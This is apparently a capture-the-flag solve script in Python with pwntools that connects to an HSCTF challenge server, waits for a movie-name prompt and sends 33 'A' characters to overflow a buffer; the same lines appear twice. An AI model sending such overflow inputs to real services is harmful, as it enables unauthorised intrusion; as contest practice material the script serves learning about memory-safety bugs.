Source
Solve script
from pwn import *
p = remote("shell.hsctf.com", 10000)
p.recvuntil("What was the name of the last movie you watched?\n")
p.send('A' * 33)
from pwn import *
p = remote("shell.hsctf.com", 10000)
p.recvuntil("What was the name of the last movie you watched?\n")
p.send('A' * 33)